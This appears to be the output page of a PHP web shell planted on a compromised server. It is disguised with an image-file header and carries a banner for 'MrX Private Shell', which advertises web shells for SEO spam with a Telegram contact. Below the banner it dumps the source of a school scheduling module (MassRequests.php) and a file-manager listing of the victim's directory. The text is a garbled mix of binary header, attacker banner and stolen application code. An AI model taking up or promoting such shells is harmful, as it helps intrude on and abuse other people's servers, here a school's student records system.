����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
require_once 'modules/Scheduling/functions.inc.php';
if ( $_REQUEST['modfunc'] === 'save' )
{
if ( ! empty( $_SESSION['MassRequests.php'] ) )
{
if ( isset( $_REQUEST['student'] )
&& is_array( $_REQUEST['student'] ) )
{
$course_exists = DBGetOne( "SELECT 1
FROM courses
WHERE COURSE_ID='" . (int) $_SESSION['MassRequests.php']['course_id'] . "'
AND SYEAR='" . UserSyear() . "'" );
if ( $course_exists )
{
$current_RET = DBGet( "SELECT STUDENT_ID
FROM schedule_requests
WHERE COURSE_ID='" . (int) $_SESSION['MassRequests.php']['course_id'] . "'
AND SYEAR='" . UserSyear() . "'", [], [ 'STUDENT_ID' ] );
foreach ( (array) $_REQUEST['student'] as $student_id )
{
if ( ! empty( $current_RET[$student_id] ) )
{
continue;
}
DBInsert(
'schedule_requests',
[
'SYEAR' => UserSyear(),
'SCHOOL_ID' => UserSchool(),
'STUDENT_ID' => (int) $student_id,
'SUBJECT_ID' => (int) $_SESSION['MassRequests.php']['subject_id'],
'COURSE_ID' => (int) $_SESSION['MassRequests.php']['course_id'],
'MARKING_PERIOD_ID' => '',
'WITH_TEACHER_ID' => $_REQUEST['with_teacher_id'],
'NOT_TEACHER_ID' => $_REQUEST['without_teacher_id'],
'WITH_PERIOD_ID' => $_REQUEST['with_period_id'],
'NOT_PERIOD_ID' => $_REQUEST['without_period_id'],
]
);
}
$note[] = button( 'check' ) . ' ' .
_( 'This course has been added as a request for the selected students.' );
}
else
{
$error[] = _( 'No courses found' );
}
}
else
{
$error[] = _( 'You must choose at least one student.' );
}
}
else
{
$error[] = _( 'You must choose a course.' );
}
// Unset modfunc redirect URL.
RedirectURL( 'modfunc' );
unset( $_SESSION['MassRequests.php'] );
}
if ( $_REQUEST['modfunc'] != 'choose_course' )
{
DrawHeader( ProgramTitle() );
echo ErrorMessage( $error );
echo ErrorMessage( $note, 'note' );
if ( $_REQUEST['search_modfunc'] === 'list' )
{
echo '<form action="' . URLEscape( 'Modules.php?modname=' . $_REQUEST['modname'] . '&modfunc=save' ) . '" method="POST">';
DrawHeader( '', SubmitButton( _( 'Add Request to Selected Students' ) ) );
echo '<br />';
PopTable( 'header', _( 'Request to Add' ) );
echo '<table><tr><td> </td><td><div id="course_div">';
if ( ! empty( $_SESSION['MassRequests.php'] ) )
{
$course_title = DBGetOne( "SELECT TITLE
FROM courses
WHERE COURSE_ID='" . (int) $_SESSION['MassRequests.php']['course_id'] . "'" );
echo $course_title;
}
$popup_url = URLEscape( 'Modules.php?modname=' . $_REQUEST['modname'] . '&modfunc=choose_course' );
echo '</div><a href="#" onclick="' . AttrEscape( 'popups.open(
' . json_encode( $popup_url ) . '
); return false;' ) . '">' . _( 'Choose a Course' ) . '</a><br /><br /></td></tr>';
echo '<tr><td>' . _( 'With' ) . '</td><td>';
echo '<table><tr class="st"><label><select name="with_teacher_id"><option value="">' . _( 'N/A' ) . '</option>';
//FJ fix bug teacher's schools is NULL
//$teachers_RET = DBGet( "SELECT STAFF_ID,LAST_NAME,FIRST_NAME,MIDDLE_NAME FROM staff WHERE SCHOOLS LIKE '%,".UserSchool().",%' AND SYEAR='".UserSyear()."' AND PROFILE='teacher' ORDER BY LAST_NAME,FIRST_NAME" );
$teachers_RET = DBGet( "SELECT STAFF_ID," . DisplayNameSQL() . " AS FULL_NAME
FROM staff
WHERE (SCHOOLS IS NULL OR position('," . UserSchool() . ",' IN SCHOOLS)>0)
AND SYEAR='" . UserSyear() . "'
AND PROFILE='teacher'
ORDER BY FULL_NAME" );
foreach ( (array) $teachers_RET as $teacher )
{
echo '<option value="' . AttrEscape( $teacher['STAFF_ID'] ) . '">' . $teacher['FULL_NAME'] . '</option>';
}
echo '</select>' . FormatInputTitle( _( 'Teacher' ) ) . '</label></td></td></tr>
<tr class="st"><td><label><select name="with_period_id"><option value="">' . _( 'N/A' ) . '</option>';
$periods_RET = DBGet( "SELECT PERIOD_ID,TITLE
FROM school_periods
WHERE SCHOOL_ID='" . UserSchool() . "'
AND SYEAR='" . UserSyear() . "'
ORDER BY SORT_ORDER IS NULL,SORT_ORDER" );
foreach ( (array) $periods_RET as $period )
{
echo '<option value="' . AttrEscape( $period['PERIOD_ID'] ) . '">' . $period['TITLE'] . '</option>';
}
echo '</select>' . FormatInputTitle( _( 'Period' ) ) . '</td></tr></table>';
echo '</td></tr><tr><td>' . _( 'Without' ) . '</td>';
echo '<td><table><tr class="st"><td><label><select name="without_teacher_id"><option value="">' . _( 'N/A' ) . '</option>';
foreach ( (array) $teachers_RET as $teacher )
{
echo '<option value="' . AttrEscape( $teacher['STAFF_ID'] ) . '">' . $teacher['FULL_NAME'] . '</option>';
}
echo '</select>' . FormatInputTitle( _( 'Teacher' ) ) . '</label></td></tr><tr class="st"><td>
<label><select name="without_period_id"><option value="">' . _( 'N/A' ) . '</option>';
foreach ( (array) $periods_RET as $period )
{
echo '<option value="' . AttrEscape( $period['PERIOD_ID'] ) . '">' . $period['TITLE'] . '</option>';
}
echo '</select>' . FormatInputTitle( _( 'Period' ) ) . '</label></td></tr></table>';
echo '</td></tr></table>';
PopTable( 'footer' );
echo '<br />';
}
}
if ( ! $_REQUEST['modfunc'] )
{
if ( $_REQUEST['search_modfunc'] != 'list' )
{
unset( $_SESSION['MassRequests.php'] );
}
$extra['link'] = [ 'FULL_NAME' => false ];
$extra['SELECT'] = ",NULL AS CHECKBOX";
$extra['functions'] = [ 'CHECKBOX' => 'MakeChooseCheckbox' ];
$extra['columns_before'] = [ 'CHECKBOX' => MakeChooseCheckbox( 'required', 'STUDENT_ID', 'student' ) ];
$extra['new'] = true;
Widgets( 'request' );
MyWidgets( 'ly_course' );
//Widgets('activity');
Search( 'student_id', $extra );
if ( $_REQUEST['search_modfunc'] === 'list' )
{
echo '<br /><div class="center">' . SubmitButton( _( 'Add Request to Selected Students' ) ) . "</div></form>";
}
}
if ( $_REQUEST['modfunc'] == 'choose_course' )
{
//FJ fix bug window closed
if ( empty( $_REQUEST['course_id'] ) )
{
include 'modules/Scheduling/Courses.php';
}
else
{
$_SESSION['MassRequests.php']['subject_id'] = issetVal( $_REQUEST['subject_id'] );
$_SESSION['MassRequests.php']['course_id'] = issetVal( $_REQUEST['course_id'] );
$course_title = DBGetOne( "SELECT TITLE
FROM courses
WHERE COURSE_ID='" . (int) $_SESSION['MassRequests.php']['course_id'] . "'" );
echo '<script>opener.document.getElementById("course_div").innerHTML = ' .
json_encode( $course_title ) . '; window.close();</script>';
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AddDrop.php | File | 2.52 KB | 0644 |
|
| Courses.php | File | 52.23 KB | 0644 |
|
| IncompleteSchedules.php | File | 4.17 KB | 0644 |
|
| MassDrops.php | File | 9.03 KB | 0644 |
|
| MassRequests.php | File | 6.37 KB | 0644 |
|
| MassSchedule.php | File | 8.22 KB | 0644 |
|
| Menu.php | File | 2.4 KB | 0644 |
|
| PrintClassLists.php | File | 4.24 KB | 0644 |
|
| PrintClassPictures.php | File | 8.54 KB | 0644 |
|
| PrintRequests.php | File | 3.64 KB | 0644 |
|
| PrintSchedules.php | File | 14.09 KB | 0644 |
|
| Requests.php | File | 9.52 KB | 0644 |
|
| RequestsReport.php | File | 842 B | 0644 |
|
| Schedule.php | File | 27.21 KB | 0644 |
|
| ScheduleReport.php | File | 1.13 KB | 0644 |
|
| Scheduler.php | File | 20.4 KB | 0644 |
|
| functions.inc.php | File | 2.69 KB | 0644 |
|
| new_Requests.php | File | 2.28 KB | 0644 |
|